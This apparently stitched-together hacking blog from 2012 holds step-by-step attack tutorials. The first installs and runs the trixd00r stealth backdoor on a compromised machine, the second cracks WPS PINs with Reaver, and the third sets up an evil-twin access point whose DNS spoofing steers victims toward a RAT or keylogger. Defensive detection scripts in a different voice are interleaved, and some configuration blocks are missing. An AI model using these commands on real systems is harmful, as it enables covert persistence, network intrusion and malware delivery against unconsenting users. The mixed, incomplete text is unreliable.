Feeding you Hacks

Wednesday, 10 October 2012

Books to get you going as a Pentester

I thought I would contribute a few books that I have read that got me really interested in penetration testing, so here you go. I'm sure there are many other great books but these are the ones I liked. I hope everyone enjoys these books as much as I did.

Trixd00r is a great little tool from the guys over at nullsecurity: a very stealthy backdoor for any *nix system. It's got a server and a client, so obviously to use this you would already have access to the box, but if you need to come back later trixd00r is perfect for that.
Also, to run the server on the compromised machine you will need to either be root, or whatever user you are needs to be in the sudoers file and you need to know their password.

Alright moving on, go ahead and grab the tar file...

Code:

wget http://www.nullsecurity.net/tools/backdoor/trixd00r-0.0.1.tar.gz

Untar it...

Code:

tar -zxvf trixd00r-0.0.1.tar.gz

Go to the newly created directory...

Code:

cd trixd00r-0.0.1

Okay, so now we type the command make on its own to get the installation directions, and you will get the following:

Okay, so as you can see it gives us the option to install on quite a few different OS's; in this case I will choose Linux.

Code:

make linux

Alright, so it should spit some stuff on your screen, and when you run ls you should have some new goodies in the directory.

Note*
If you are using this on OS X, choose linux. You will need to have the command line utils installed though; just go to GitHub and get the prepackaged gcc installer if you don't have time or don't want to download Xcode, otherwise you get an error about no gmake/make being present.
Oh, and if Linux complains about no gmake too, just make a symbolic link between make and gmake:

Code:

ln -s /usr/bin/make /usr/bin/gmake

The great thing about trixd00r is that the server (compromised machine) listens invisibly for "magic packets" sent from the client (attacker), and when it gets those packets it will either bind a shell on a TCP/UDP port of our choosing or connect back to us, again using either protocol.

Good job, we have the server (trixd00rd) and the client (trixd00r) ready for use. Now to the fun stuff!

Now we need to set up trixd00rd on the compromised machine; to do that we run sudo ./trixd00rd -H to get a list of options.

Note*
A really cool feature is that you just put a ? after an option to see what it needs.

So first off, the -i flag is for the interface connected to the web that we'll be using...pretty self-explanatory.

And sudo ./trixd00rd -i en1 -t ? would get me...

The default is the TCP SYN packet, which I'm just going to leave. The other protocols follow the same process as this one; I'll leave it up to you to play with them and discover why one would be more advantageous than the others, depending on the situation. If you don't know the different protocols and how they work, I recommend reading up on them, because they're just good to know. Not understanding even basic TCP/IP (I'm no expert) is just ignorant, especially when it's fun to learn about, and hacking/pentesting and information security have so much to do with it.

The -s flag is which shell mode we want to use; again I used a ? to see the different options. In this case we are using the TCP Bind option, which is -s 0.

Alright, the two options above (-t and -s) are the most important, so I will show you the rest of the options I used, a picture, and then explain them below.

Code:

sudo ./trixd00rd -i en1 -t 0 -s 0 -b <port> -v

-b 2302 This is the port that our listener will be bound to, waiting for the magic packet to give us our shell. The default is 31337, which comes up as "Elite" on a port scan, so if the admin, or user, or whoever runs a scan because he's security minded, he will see that port open, and it is known to be a trojan/backdoor/RAT/etc. So I always change my backdoor ports to shit that is a game app or some obscure port that has nothing to do with any of the above - out of sight, out of mind.
^^^The only time this will come up on a port scan is when you are actually interacting with trixd00rd; any other time it will just show up as closed or filtered to an outsider - that's why this is so stealthy!
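A host-side check that complements the port-scan observation above, written for this page as an added example (it is not part of the post or of trixd00r): a listener that answers magic packets on a port that otherwise reports closed has to read frames through a raw AF_PACKET socket, and Linux lists every such socket in /proc/net/packet. The script parses that table, flags running SOCK_RAW sockets bound to all protocols (0003) and maps their inodes back to PIDs; the table embedded below is a constructed sample.

```python
import os
from typing import List, Optional

# Constructed sample of /proc/net/packet, where Linux lists every AF_PACKET socket.
# Columns: sk RefCnt Type Proto Iface R Rmem User Inode. Type 3 = SOCK_RAW, 2 = SOCK_DGRAM;
# Proto 0003 = ETH_P_ALL, i.e. the socket receives every frame on the interface.
SAMPLE_PACKET_TABLE = """\
sk               RefCnt Type Proto  Iface R Rmem   User   Inode
ffff88003a1b2c00 3      3    0003   2     1 0      0      48213
ffff88003a1b2d00 3      2    0800   3     0 0      1000   48977
"""
SOCK_TYPES = {"3": "SOCK_RAW", "2": "SOCK_DGRAM"}

def parse_packet_table(text: str) -> List[dict]:
    """One dict per socket row of a /proc/net/packet dump (header row skipped)."""
    rows = []
    for line in text.strip().splitlines()[1:]:
        fields = line.split()
        if len(fields) < 9:
            continue                          # tolerate a truncated or blank line
        rows.append({
            "type": SOCK_TYPES.get(fields[2], fields[2]),
            "proto": fields[3],               # Ethernet protocol as 4 hex digits
            "ifindex": int(fields[4]),
            "running": fields[5] == "1",
            "uid": int(fields[7]),
            "inode": fields[8],
        })
    return rows

def suspicious(sock: dict) -> bool:
    """A running SOCK_RAW socket bound to every protocol is what a sniffing listener needs."""
    return sock["type"] == "SOCK_RAW" and sock["proto"] == "0003" and sock["running"]

def audit(text: str) -> List[str]:
    """Inodes of the sockets in a /proc/net/packet dump that match the sniffer profile."""
    return [s["inode"] for s in parse_packet_table(text) if suspicious(s)]

def owner_of_inode(inode: str) -> Optional[int]:
    """Map a socket inode to its PID via /proc/*/fd (live system only; root sees all of them)."""
    target = f"socket:[{inode}]"
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            fds = os.listdir(f"/proc/{pid}/fd")
            if any(os.readlink(f"/proc/{pid}/fd/{fd}") == target for fd in fds):
                return int(pid)
        except OSError:
            continue                          # process exited, or its fd table is not readable
    return None
```

On a live host, feed the contents of /proc/net/packet to audit() and pass each inode to owner_of_inode(). Packet-capture tools and DHCP clients hold the same kind of socket legitimately, so a hit is a lead for triage, not a verdict.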

-v The -v option is for verbosity. I like to see output to know what is going on, and if something goes wrong it will say so in plain English.

Our server is waiting for the magic packets, so now we go to our client and interact with the shell!

Code:

./trixd00r -h <target IP> -t 0 -s 0 -p <port> -m <passphrase> -v

-h 192.168.1.3 This tells trixd00r where to send the packet to get our shell.

-t 0 and -s 0 have to match up with trixd00rd - for obvious reasons.

-p 2302 This tells trixd00r which port the server is listening on.

-v Again, verbosity.

And we're done. If all went well, you'll get a nice welcome banner like the one below, and a prompt waiting for input!

To COMPLETELY close the connection we use control+C on the client and then run the client again with -m byebye and hit enter. It will tell you that it sent the magic packet, which means the connection was closed and now the server is NOT listening anymore.

Server side if you send the byebye packet it will look like this...

To keep the server listening on the compromised machine so you can come back later, just hit control+C on the client but do not send the byebye packet.

I have been studying for this certification exam and this book has been
very useful. This isn't a one stop shop to this exam. They encourage
you to learn more than what this book teaches, but I wanted to share
this with anyone who wants to study for the exam or just read some
useful information.

Tuesday, 2 October 2012

HISTORY LESSON
WPS (Wi-Fi Protected Setup) is a feature created in 2007 to make Wi-Fi protected networking easy for the average user while keeping it secure. However, due to a design flaw in the authentication of the device PIN, it is possible to crack the PIN on a WPS-enabled AP. This has nothing to do with cracking the WPA/WPA2 PSK, although the PSK will be obtained with this method.

The PIN is broken down as 11112223 (example for explanation only and not to be taken literally). The 1111 is the first half of the PIN. The 222 is the second half of the PIN. The 3 is a checksum of the entire PIN (the first 7 digits). Reaver must first obtain the first half of the PIN (1111) before it can go on to the second half (222). When reaver is running you will notice that 1111 changes while 222 remains the same and 3 changes, until it obtains the first half of the PIN. Then 1111 remains the same while 222 and 3 change as it obtains the second half of the PIN.
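As an added worked example (mine, not from the post or from reaver), here is the checksum an access point verifies on the eighth digit and the attempt counts that follow from the design flaw described above: because the protocol confirms the two halves separately, the 4 free digits of the first half and the 3 free digits of the second half are guessed one after the other instead of together. The 12345670 value used in the test is the example PIN from hostapd's WPS documentation.

```python
# Weights of the WPS PIN checksum, applied to the seven data digits left to right.
WEIGHTS = (3, 1, 3, 1, 3, 1, 3)

def wps_checksum(first7: str) -> int:
    """Eighth digit for a 7-digit PIN body: the digit that makes the weighted sum a multiple of 10."""
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("expected exactly seven digits")
    total = sum(w * int(d) for w, d in zip(WEIGHTS, first7))
    return (10 - total % 10) % 10

def is_valid_pin(pin: str) -> bool:
    """True when an 8-digit PIN carries the correct checksum digit."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(pin[:7]) == int(pin[7])

def worst_case_attempts(split_verification: bool) -> int:
    """Upper bound on PIN guesses a registrar needs.
    With the split, the 4-digit first half is confirmed before the 3 free digits of the second
    half are tried (the checksum is derived); without it, all 7 free digits are guessed at once."""
    return 10**4 + 10**3 if split_verification else 10**7

def describe(pin: str) -> dict:
    """Break an 8-digit PIN into the halves the post describes, plus whether its checksum is right."""
    return {
        "first_half": pin[:4],
        "second_half": pin[4:7],
        "checksum": pin[7],
        "valid": is_valid_pin(pin),
    }
```

The post's illustrative 11112223 is not a valid PIN (its correct checksum digit would be 8), which is why the author says it is not to be taken literally.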

With Backtrack running, download Reaver, then extract and install it as follows from a terminal (xxxx being the release number, which will change with updates):
tar xvfz reaver1.xxxx
cd reaver1.xxxx
cd src
./configure
make
make install

Assuming no errors, let's continue.
Open a fresh terminal and let's get the adapter running in monitor mode. Type the following:

airmon-ng (this will list your wifi adapters; the most common is wlan0)
airmon-ng start wlan0 (replace wlan0 with the one you get listed)
You should receive output that tells you which interface is in monitor mode, most commonly mon0.

Now, in the same terminal, let's see who is around. Type the following:
airodump-ng --encrypt wpa mon0 (this will display only WPA/WPA2 encrypted networks. Let it run for 30 sec or so till you see all the APs that you can, then hit CTRL+C.)

APs are listed by power, so you want to start with the top ones and work your way down the list. But wait... how do I know if WPS is enabled? Glad you asked.

Open a new terminal and type the following:
walsh -i mon0 (replace mon0 as noted above. This will scan for all WPS-enabled APs in range and remove the guesswork; compare it to the airodump-ng output and pick out the highest powered AP first.)

Now we are ready to start. Go back to the terminal that you installed reaver in and type the following:

reaver -i mon0 -b BSSID -S -vv (change mon0 as noted previously. BSSID is the MAC address of the AP; you can use the MAC from the walsh output or the airodump-ng output, as they will be the same. The -S switch reduces the packet size sent to the AP and thereby decreases the attack time. The -vv switch will display all errors and PINs tested.)

Now just let it run.

THINGS TO NOTE:
You may see the percentage in the reaver output jump from 2% to 90% just like that. This is normal when it finds the first half of the PIN. This is also why the second half of the PIN (222 in the example above) remains constant before it finds the first half.

Errors are a common thing to see and are caused by many variables, for example:
WARNING: Receive timeout occurred
WARNING: 10 failed connections in a row
WARNING: Out of order packet received, re-trasmitting last message
Just let it run.

Tired of cracking WEP? Tired of WPA and countless hours of dictionary attacks? Then it's time to be sexy. YOU need to be sexy. And I'll show you how.

Here's the deal: how would you like to create a fake access point named, say, Wifi Hotspot, and have people connect to YOU? From there, you can mess around with them, DNS spoof them to websites, or even to your own web server convincing them to download your RAT/keylogger. Or how about monitoring all their websites and network traffic? I won't show you all of this, but I'll show you some.

First off, I would like to give a huge shoutout to member proxx8187. He helped me a great deal diagnosing problems in the making of this tutorial. Some of you may recognize him as the encyclopedia giving answers to all of your incessant questions ;) Another big shoutout goes to SpyFi. He inspired me to pursue this area and thus the creation of this tutorial. Some may recognize him as the genius behind many great tutorials all around HF, as well as his Android hacking threads. Another member who helped to diagnose problems was GeeMann. He's amazing and one of the highest quality users I've seen around the HF wireless section. In case you didn't know, he's the mastermind behind our WPS cracking tutorial. I also would like to thank CapitalS for helping me out too in the creation of this tutorial. This was made mostly by me, but would have been impossible without the help of these four great members!

Now the tutorial!! This is for educational purposes only. Please stay ethical with this and always get permission before you do something. I know you will ignore my plea for righteousness, but really, stay ethical. It will pay off in the long term! Now, let me give a brief overview of what we are going to accomplish here. We will create a fake access point with whatever name you like, and provide any person that connects to it with internet access, so they will think they are on a legitimate access point! Then from there, we can do many things to the client.

TABLE OF CONTENTS:

WHAT WE NEED

STEP ONE: GETTING THE DHCP3 SERVER

STEP TWO: CONFIGURING THE DHCP3 SERVER

STEP THREE: SETTING UP THE FAKE ACCESS POINT AND RUNNING THE DHCP3 SERVER

STEP FOUR: SETTING UP IPTABLES SO THAT CLIENT CAN HAVE INTERNET ACCESS

STEP FIVE: SCREWING WITH PEOPLE

WHAT WE NEED:
1. Two wireless interfaces (an external USB wifi adapter, plus your internal laptop wifi adapter). A good external wifi adapter is the ALFA AWUS036H. It's the one I use. You can get one for about 25 dollars on Amazon.
2. Backtrack 5 R2 (R1 should work, but this was tested on R2)
3. A brain please.

STEP ONE: GETTING THE DHCP3 SERVER

We need to update Backtrack and then install the dhcp3 server.

Code:

apt-get update && apt-get upgrade && apt-get dist-upgrade

Code:

apt-get install dhcp3-server

Cool, we got all the stuff we need! We are ready to begin our attack. Please make sure that your laptop interface (should be wlan0) is connected to your own router. Make sure that your external interface is plugged in and ready to go (this one should be wlan1).

STEP TWO: CONFIGURING THE DHCP3 SERVER

We must begin the process of configuring our dhcp3 server so that our clients will receive an IP address when they connect. I expect your laptop interface to be connected to your router right now, and the external interface plugged in but not connected to any router, so we will run a check to determine our DNS address.

Code:

cat /etc/resolv.conf

See that IP address printed after "nameserver"? That's the DNS address. Please take note of it. In the code that follows, we will replace $dns with the DNS address you saw in the previous command.

Code:

gedit /etc/dhcp3/dhcpd.conf

If you are using Backtrack 5 KDE version, type this instead:

Code:

kwrite /etc/dhcp3/dhcpd.conf

If kwrite doesn't work, replace it with kate.

Now we have a text editor open with some text in it. Delete everything you see, and replace it with this:

Remember to replace $dns with your DNS address you learned earlier!!! So a possible line will look like this:

Code:

option domain-name-servers 192.168.0.1;

STEP THREE: SET UP THE FAKE ACCESS POINT AND RUN THE DHCP3 SERVER

Let's configure our wireless interfaces, shall we? We need to put our external interface into monitor mode. If you don't know the names of your interfaces, type "ifconfig" without quotes and it will show you. In my situation, the external interface is wlan1, so just replace that with YOUR external interface.

Code:

airmon-ng start wlan1

Code:

airbase-ng -e "NAME OF ACCESS POINT HERE" -c 9 mon0

Now open a new terminal and type the following code, which will set up our fake access point along with the dhcp3 server. Be sure to enter each command separately.

You should now have two terminals running: one with airbase-ng maintaining your fake access point, and another with the dhcp3 server open. We now need to set up our iptables to let our clients gain internet access.

STEP FOUR: SET UP IPTABLES SO THAT CLIENT CAN HAVE INTERNET ACCESS

Your laptop interface should be connected to your router!! I am assuming your laptop interface is wlan0, but if not, type ifconfig to see which one it is. If you don't know what it is, you should close out of this tutorial. There are some variables in this next code you will need to replace yourself. I will tell you how and which.

We need to find your gateway address. Type the following into a new terminal:

Code:

route | grep "default"

See that IP address next to "default"? That is your gateway IP address, and you should take note of it. It should, in most cases, be the same as your DNS address. Remember your laptop interface? It should be wlan0; if not, you should know what it is. In the following code, replace $interface with your laptop interface, and $gateway with your gateway IP address. Be sure to enter each command separately (yes, a lot of copy and pasting).

Congratulations!!! You have set up a fake access point with a WORKING internet connection. Go ahead, give it a try using another computer and connect to your access point!
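The same setup seen from the defending side, as an added example that is not part of the original tutorial: a wireless scan shows the airbase-ng clone as a second BSSID advertising an ESSID you own, usually with no encryption, so the script below checks scan rows against an inventory of your own access points. The scan rows and the inventory are constructed; the CSV carries only the fields an airodump-ng listing shows (BSSID, channel, Privacy, PWR, ESSID), not airodump-ng's exact file format.

```python
import csv
import io
from typing import Dict, List, Set, Tuple

# Constructed scan records (not real airodump-ng output). The last row mimics an airbase-ng
# clone of "HomeNet": same name, different BSSID, open (OPN) instead of WPA2, strong signal.
SCAN_CSV = """\
BSSID,channel,Privacy,PWR,ESSID
00:11:22:33:44:55,6,WPA2,-48,HomeNet
66:77:88:99:AA:BB,11,WPA2,-70,OfficeNet
DE:AD:BE:EF:00:01,9,OPN,-35,HomeNet
"""

# Inventory of the BSSIDs you operate for each of your own ESSIDs (constructed).
KNOWN_APS: Dict[str, Set[str]] = {
    "HomeNet": {"00:11:22:33:44:55"},
    "OfficeNet": {"66:77:88:99:AA:BB"},
}

def parse_scan(text: str) -> List[Dict[str, str]]:
    """Read the scan table into dicts keyed by column name; MACs are normalised to upper case."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for r in rows:
        r["BSSID"] = r["BSSID"].strip().upper()
    return rows

def find_rogue_aps(rows: List[Dict[str, str]],
                   known: Dict[str, Set[str]]) -> List[Tuple[str, str, str]]:
    """Return (ESSID, BSSID, reason) for every AP that advertises one of our ESSIDs from a
    BSSID we do not operate. The reason notes when it also drops encryption, the usual tell
    of a clone that has to accept anyone without knowing the real network's passphrase."""
    findings = []
    for r in rows:
        essid = r["ESSID"]
        if essid not in known or r["BSSID"] in known[essid]:
            continue                                   # not our name, or one of our own APs
        reason = "unknown BSSID for our ESSID"
        if r["Privacy"] == "OPN":
            reason += "; open network impersonating an encrypted one"
        findings.append((essid, r["BSSID"], reason))
    return findings

if __name__ == "__main__":
    for essid, bssid, why in find_rogue_aps(parse_scan(SCAN_CSV), KNOWN_APS):
        print(f"{essid} from {bssid}: {why}")
```

An unknown BSSID can have innocent explanations (a newly installed AP, a neighbour reusing a common name), so treat a hit as a lead for triage; the stronger signal is the same name being offered without encryption.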

STEP FIVE: SCREWING WITH PEOPLE

Now that our client(s) are connected to YOU, you can do whatever you want to them! One of my favorites is the use of DNS spoofing. While your clients are connected to you, you can redirect whatever website they visit to whatever website you want them to go to. Or, even better, you can redirect them to your own web server on your computer, which could convince them to download a RAT or keylogger.

I will show you how to perform a simple DNS spoofing attack on your
client. Create a file in your ROOT folder named spoof. Enter the
following text into that file.

Code:

192.168.2.129 *

Now we initiate the DNS spoofing attack. This will redirect every website our client visits to YOU. So if you are running your own web server on your computer, they will be redirected to that web server. This is great for Java Applet attacks and other Social Engineering Toolkit stuff! Use the search option at the top of this website to find out more.

Code:

dnsspoof -i at0 -f /root/spoof

There, now every website they visit will be redirected back to your own web server! Note, if you want this attack to be more flexible, edit the spoof file you created earlier. 192.168.2.129 is the IP address you want to redirect them to. The parameter after that is the website you want to be redirected. For example, if I want to redirect my client's requests for google.com to yahoo.com, I would enter the following in my spoof file.

Code:

98.139.183.24 google.com

Here, 98.139.183.24 is the IP address of yahoo.com. You can find the IP address of websites by pinging them in the terminal.

Code:

ping yahoo.com

This is the end of my tutorial. I hope you found it informative, as well as a fresh new way of performing wireless attacks. There are myriad ways you can leverage this attack to perform all sorts of man-in-the-middle attacks, but I leave that up to you to research. I did the hard part for you, so now it's up to you to figure out the rest! Please say thanks!